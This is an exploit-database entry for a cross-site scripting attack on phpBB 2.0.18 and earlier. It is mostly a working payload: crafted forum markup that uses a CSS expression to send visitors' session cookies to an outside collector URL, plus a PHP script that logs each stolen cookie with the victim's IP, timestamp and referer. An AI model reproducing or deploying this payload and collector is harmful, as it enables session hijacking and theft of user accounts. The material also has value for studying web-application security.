phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit

2005-12-21T00:00:00
ID 1337DAY-ID-223
Type zdt
Reporter jet
Modified 2005-12-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit
====================================================




/******************************************************************

phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- 'the html is on exploit'

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
	
		develop a pure, lucid mind, not 
		depending upon sound, flavor,
		touch, odor, or any quality.
				- the diamond sutra

******************************************************************/

phpbb code:

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'</B>

c.php:

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>



#  0day.today [2018-03-09]  #